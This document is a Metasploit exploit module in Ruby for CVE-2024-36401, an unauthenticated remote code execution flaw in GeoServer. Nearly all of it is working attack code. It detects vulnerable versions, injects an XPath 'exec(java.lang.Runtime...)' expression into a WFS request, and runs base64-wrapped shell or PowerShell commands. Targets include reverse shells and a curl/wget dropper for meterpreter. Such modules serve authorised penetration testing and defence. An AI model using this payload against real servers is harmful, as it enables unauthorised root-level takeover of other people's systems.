Geoserver Unauthenticated Remote Code Execution Exploit

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Geoserver unauthenticated Remote Code Execution',
        'Description' => %q{
          GeoServer is an open-source software server written in Java that provides
          the ability to view, edit, and share geospatial data.
          It is designed to be a flexible, efficient solution for distributing geospatial data
          from a variety of sources such as Geographic Information System (GIS) databases,
          web-based data, and personal datasets.
          In the GeoServer versions < 2.23.6, >= 2.24.0, < 2.24.4 and >= 2.25.0, < 2.25.1,
          multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users
          through specially crafted input against a default GeoServer installation due to unsafely
          evaluating property names as XPath expressions.
          An attacker can abuse this by sending a POST request with a malicious xpath expression
          to execute arbitrary commands as root on the system.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
          'jheysel-r7', # MSF module Windows support
          'Steve Ikeoka' # Discovery
        ],
        'References' => [
          ['CVE', '2024-36401'],
          ['URL', 'https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv'],
          ['URL', 'https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401'],
          ['URL', 'https://attackerkb.com/topics/W6IDY2mmp9/cve-2024-36401']
        ],
        'DisclosureDate' => '2024-07-01',
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => ['unix', 'linux'],
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd
              # Tested with cmd/unix/reverse_bash
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => ['linux'],
              'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE],
              'Type' => :linux_dropper,
              'Linemax' => 16384,
              'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne']
              # Tested with linux/x64/meterpreter_reverse_tcp
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => ['Windows'],
              'Arch' => ARCH_CMD,
              'Type' => :win_cmd
              # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 8080,
          'SSL' => false
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path of the OpenMediaVault web application', '/'])
      ]
    )
  end

  def check_version
    print_status('Trying to detect if target is running a vulnerable version of GeoServer.')
    res = send_request_cgi!({
      'uri' => normalize_uri(target_uri.path, 'geoserver', 'web', 'wicket', 'bookmarkable', 'org.geoserver.web.AboutGeoServerPage'),
      'keep_cookies' => true,
      'method' => 'GET'
    })
    return nil unless res && res.code == 200 && res.body.include?('GeoServer Version')

    html = res.get_html_document
    unless html.blank?
      # html identifier for Geoserver version information: <span id="version">2.23.2</span>
      version = html.css('span[id="version"]')
      return Rex::Version.new(version[0].text) unless version[0].nil?
    end
    nil
  end

  def get_valid_featuretype
    allowed_feature_types = ['sf:archsites', 'sf:bugsites', 'sf:restricted', 'sf:roads', 'sf:streams', 'ne:boundary_lines', 'ne:coastlines', 'ne:countries', 'ne:disputed_areas', 'ne:populated_places']
    res = send_request_cgi!({
      'uri' => normalize_uri(target_uri.path, 'geoserver', 'wfs'),
      'method' => 'GET',
      'ctype' => 'application/xml',
      'keep_cookies' => true,
      'vars_get' => {
        'request' => 'ListStoredQueries',
        'service' => 'wfs'
      }
    })
    return nil unless res && res.code == 200 && res.body.include?('ListStoredQueriesResponse')

    xml = res.get_xml_document
    unless xml.blank?
      xml.remove_namespaces!
      # get all the FeatureTypes and store them in an array of strings
      retrieved_feature_types = xml.xpath('//ReturnFeatureType')
      # shuffle the retrieved_feature_types array, and loop through the list of retrieved_feature_types from GeoServer
      # return the feature type if a match is found in the allowed_feature_types array
      retrieved_feature_types.to_a.shuffle.each do |feature_type|
        return feature_type.text if allowed_feature_types.include?(feature_type.text)
      end
    end
    nil
  end

  def create_payload(cmd)
    # get a valid feature type and fail back to a default if not successful
    feature_type = get_valid_featuretype
    feature_type = 'sf:archsites' if feature_type.nil?

    case target['Type']
    when :unix_cmd || :linux_dropper
      # create customised b64 encoded payload
      # 'Encoder' => 'cmd/base64' does not work in this particular use case
      cmd_b64 = Base64.strict_encode64(cmd)
      cmd = "sh -c echo${IFS}#{cmd_b64}|base64${IFS}-d|sh"
    when :win_cmd
      enc_cmd = Base64.strict_encode64("cmd /C --% #{payload.encoded}".encode('UTF-16LE'))
      cmd = "powershell.exe -e #{enc_cmd}"
    end

    return <<~EOS
      <wfs:GetPropertyValue service='WFS' version='2.0.0'
        xmlns:topp='http://www.openplans.org/topp'
        xmlns:fes='http://www.opengis.net/fes/2.0'
        xmlns:wfs='http://www.opengis.net/wfs/2.0'>
          <wfs:Query typeNames="#{feature_type}"/>
          <wfs:valueReference>exec(java.lang.Runtime.getRuntime(), "#{cmd}")</wfs:valueReference>
      </wfs:GetPropertyValue>
    EOS
  end

  def execute_command(cmd, _opts = {})
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'geoserver', 'wfs'),
      'method' => 'POST',
      'ctype' => 'application/xml',
      'keep_cookies' => true,
      'data' => create_payload(cmd)
    })
    fail_with(Failure::PayloadFailed, 'Payload execution failed.') unless res && res.code == 400 && res.body.include?('ClassCastException')
  end

  def check
    version_number = check_version
    return CheckCode::Unknown('Could not retrieve the version information.') if version_number.nil?
    return CheckCode::Appears("Version #{version_number}") if version_number.between?(Rex::Version.new('2.25.0'), Rex::Version.new('2.25.1')) || version_number.between?(Rex::Version.new('2.24.0'), Rex::Version.new('2.24.3')) || version_number < Rex::Version.new('2.23.6')

    CheckCode::Safe("Version #{version_number}")
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

    case target['Type']
    when :unix_cmd, :win_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      # don't check the response here since the server won't respond
      # if the payload is successfully executed.
      execute_cmdstager({ linemax: target.opts['Linemax'] })
    end
  end
end